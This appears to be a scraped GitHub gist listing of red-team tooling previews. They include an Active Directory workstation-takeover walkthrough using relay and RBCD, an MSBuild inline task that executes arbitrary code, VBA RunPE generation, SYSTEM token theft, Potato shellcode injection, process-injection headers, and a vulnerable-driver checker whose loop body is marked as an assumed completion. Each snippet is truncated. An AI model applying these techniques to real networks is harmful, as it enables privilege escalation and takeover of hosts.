0xvm / Workstation-Takeover.md
Created March 7, 2024 21:57 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS to configure RBCD.
  • RBCD takeover.

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

0xvm / check_vulnerabledrivers.ps1
Created May 21, 2023 12:06 — forked from api0cradle/check_vulnerabledrivers.ps1
A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io
# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
# Author: Oddvar Moe - @oddvar.moe
$drivers = get-childitem -Path c:\windows\system32\drivers -File
$web_client = new-object system.net.webclient
# Note: the URL must not carry a leading space, or DownloadString rejects it as an invalid URI
$loldrivers = $web_client.DownloadString("https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json
Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)
# Hash every local driver once so the lookup below is a table lookup rather than a rehash per sample
$hashes = @{}
foreach ($driver in $drivers) { $hashes[(Get-FileHash -Path $driver.FullName -Algorithm SHA256).Hash] = $driver.FullName }
foreach ($lol in $loldrivers.KnownVulnerableSamples)
{
    # Loop body is cut off in the gist preview; completed here assuming each sample entry exposes a SHA256 field
    if ($lol.SHA256 -and $hashes.ContainsKey($lol.SHA256)) { Write-Output ("Vulnerable driver found: {0}" -f $hashes[$lol.SHA256]) }
}

#define _WIN32_WINNT 0x0502
#define WINVER 0x0502
#include <windows.h>
#include <errhandlingapi.h>
#include <process.h>
#include "beacon.h"
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr);
DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval);
0xvm / python3-gen-script
Last active April 28, 2022 14:03
vba-runpe-custom
#pe2vba.py
#!/usr/bin/env python3
from subprocess import Popen, PIPE
from os import system, remove
import argparse
import os.path
MAX_PROC_SIZE = 32 # Nbr of lines per procedure
MAX_LINE_SIZE = 32 # Nbr of bytes per line
0xvm / msbuild-mimi.csproj
Created April 6, 2021 18:48
msbuild and run an arbitrary executable
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<ClassExample />
</Target>
<PropertyGroup>
<PlatformTarget>x64</PlatformTarget>
</PropertyGroup>
<UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs"><![CDATA[
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
0xvm / getsystem_parent.cpp
Created January 22, 2019 23:59 — forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;

function Invoke-Potato
{
<#
.SYNOPSIS
Script leverages Reflective Potato and Invoke-ReflectivePEInjection to reflectively load the Rotten Potato DLL directly into memory. This allows you to indirectly perform the Rotten Potato attack without having to touch the disk, or utilize any external loaders.
The script takes a Shellcode parameter which will execute any arbitrary shellcode within the HostProc argument. Default is set to C:\Windows\System32\notepad.exe

/*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */
#include <windows.h>
#include <stdio.h>
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
HANDLE ProcessHandle,
PSECURITY_DESCRIPTOR SecurityDescriptor,
BOOL CreateSuspended,
ULONG StackZeroBits,
PULONG StackReserved,